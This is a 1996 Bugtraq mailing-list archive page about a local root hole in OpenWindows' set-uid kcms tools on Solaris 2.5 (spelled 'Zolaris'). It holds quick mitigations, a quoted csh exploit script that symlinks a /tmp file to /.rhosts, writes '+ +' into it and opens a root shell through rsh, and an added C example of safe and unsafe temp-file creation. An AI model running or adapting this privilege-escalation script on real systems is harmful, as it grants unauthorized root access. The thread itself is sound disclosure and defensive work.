Bugtraq mailing list archives
Re: Zolaris 2.5 Exploited.
From: beren () cosmos kaist ac kr (Jungseok Roh)
Date: Fri, 26 Jul 1996 08:48:17 -0900
I tried this posted exploit as well, and it does work (quite well, in fact). I have looked at this a little closer, and it appears that you can protect yourself from this hole by doing one of the following (these are just the quick patches, not involving changing the UID of root, installing a safer rshd, etc)

1)  root# chmod gu-s /usr/openwin/bin/kcms_c*

or

2)  root# touch /.rhosts
    root# chown root:root /.rhosts
    root# chmod 600 /.rhosts

ln -s /dev/null /.rhosts is recommended.
"Divided Alive, Interconnected Dead." that's the proverb in internet Security. :)

I am not going to say that this plugs the hole completely; I haven't had the time (and probably won't) or the experience to dig deeper into this. I will leave the deeper evaluation and patch to the experts.

Brian

P.S. If the followup to BUGTRAQ is inappropriate, my apologies.

Brian T. Wightman                             Academic Computing, UW Oshkosh
wightman () uwosh edu                         800 Algoma Blvd
Phone: (414) 424-3020                         Dempsey Hall 307
http://www.uwosh.edu/faculty_staff/wightman/  Oshkosh, Wisconsin 54901

In message <199607261337.EAA05783 () cosmos kaist ac kr>, Jungseok Roh wrote:

Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago ~ then one of my seniors told me that there might be a Funny, also UNCONCEIVABLE bugs in Openwindows.. I trusted him... and I traversed the file system under /usr/openwin .. there were just four SUIDed files .. ( if Admin installed openwin packages ) xlock, ff.core, kcms* ..

Problem made less vague

kcms_calibrate, kcms_configure are the objects we are approaching. When examining the kcms families, I found a funny stuff. kcms_configure makes the temporary(?) files in /tmp whose permission bit is 666 ( Wow The sign of Devil ),, definitely root owns it.. IT'S NAME is Kp_kcms_sys.sem !... Then all u guys know the next procedure is .

hk.. I can't show u whole the procedure right now. 'Cause My Zolaris machine is "Network Unreachable ...". One odd thing is that Exploitation Succeeds when it interacts with kcms_calibrate!!

Major procedure is making the temporary files which linked to /.rhosts then while kcms_configure tries to write /.rhosts make Thunder rolls using kcms_calibrate and Make its power Powerful.. puha.. it's like seeing Back To the Future III... then kcms_configure succeeds its operation.

I made a simple script exploiting the machine who has that fatal bug. hmm.. but I can't erase one curiosity .. Why Sun made this humble mistake ? ... plz somebody notify this bug to SUN. I don't know Her E-mail Address .. :)

(what a simple!!) script follows.

this script shows u just PROCEDURE .. re-make on your demands.

cat > uhit.sh << E_O_F
#!/bin/csh
# JungSeok. Roh ( beren () cosmos kaist ac kr )
# Junior in KAIST undergraduate. Under Management Dep .
set disp="cosmos.kaist.ac.kr:0.0"
setenv DISPLAY $disp
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp
#Making symbolic link
ln -s /.rhosts Kp_kcms_sys.sem
/usr/openwin/bin/kcms_calibrate &
while(1)
echo "Click the device you've chosen in kcms_calibrate window"
# Choose Any profiles .. hk..
# My 2.5 machine is unreachable so I can't get exact name of that profiles.
# What a fool I am.. jjap..
/usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon
if( -f /.rhosts ) then
echo -n "+ +" >> /.rhosts
# As u know , we can't login as root .. use smtp account. that has UID 0 !!
/usr/bin/rsh localhost -l smtp csh -i
endif
end
E_O_F

__
There was a Legendary Security Task Force team whose Name is K/U/S .. But BLOWED up by KOREAN National Prosecutor.. I hate them !! ....... They make me so sad .... Laughin' in bitter tears ... hk..hk..

JungSeok Roh / Junior in KAIST / beren () cosmos kaist ac kr / +82-42-869-5400

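Added example, not part of either post and not Sun's code: the root cause described above is a set-uid program writing a predictable, mode-666 file in /tmp and following a symbolic link planted under that name. The C below puts that open() pattern beside a hardened one and checks both against a constructed link in a private scratch directory; the function names, directory and file names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern (illustrative): create-or-reuse a predictable path.
 * open() follows a link at `path`; mode 0666 is world-writable. */
int open_state_unsafe(const char *path)
{
    mode_t old = umask(0);
    int fd = open(path, O_WRONLY | O_CREAT, 0666);
    umask(old);
    return fd;
}

/* Hardened pattern: O_EXCL refuses anything already at `path` (a
 * symlink included), O_NOFOLLOW is a second guard, mode is owner-only,
 * and fstat() confirms what was actually opened. */
int open_state_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demo: plant a link named like the state file, pointing at a
 * stand-in target. Returns 1 if the target was created through the link. */
int link_followed(int use_safe)
{
    char dir[] = "/tmp/symdemoXXXXXX", lnk[64], target[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/state.sem", dir);
    if (symlink(target, lnk) != 0) return -1;
    int fd = use_safe ? open_state_safe(lnk) : open_state_unsafe(lnk);
    if (fd >= 0) close(fd);
    int created = (stat(target, &st) == 0);
    unlink(target); unlink(lnk); rmdir(dir);
    return created;
}

int main(void)
{
    printf("unsafe: %d, safe: %d\n", link_followed(0), link_followed(1));
    return 0;
}
```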
Current thread:
- Re: Zolaris 2.5 Exploited. Leif Hedstrom (Jul 25)
- admintool (was Re: Zolaris 2.5 Exploited.) anthony baxter (Jul 25)
- <Possible follow-ups>
- Zolaris 2.5 Exploited. Jungseok Roh (Jul 26)
- Re: Zolaris 2.5 Exploited. Brian T. Wightman (Jul 25)
- Re: Zolaris 2.5 Exploited. Jungseok Roh (Jul 26)
- Re: Zolaris 2.5 Exploited. Brian T. Wightman (Jul 25)
- Re: Zolaris 2.5 Exploited. Eugene Bradley (Jul 26)
- Re: Zolaris 2.5 Exploited. Matthew G. Harrigan (Jul 26)
- Re: Zolaris 2.5 Exploited. Steph Bridges (Jul 26)
- Re: Zolaris 2.5 Exploited. Jeff Wolfe (Jul 26)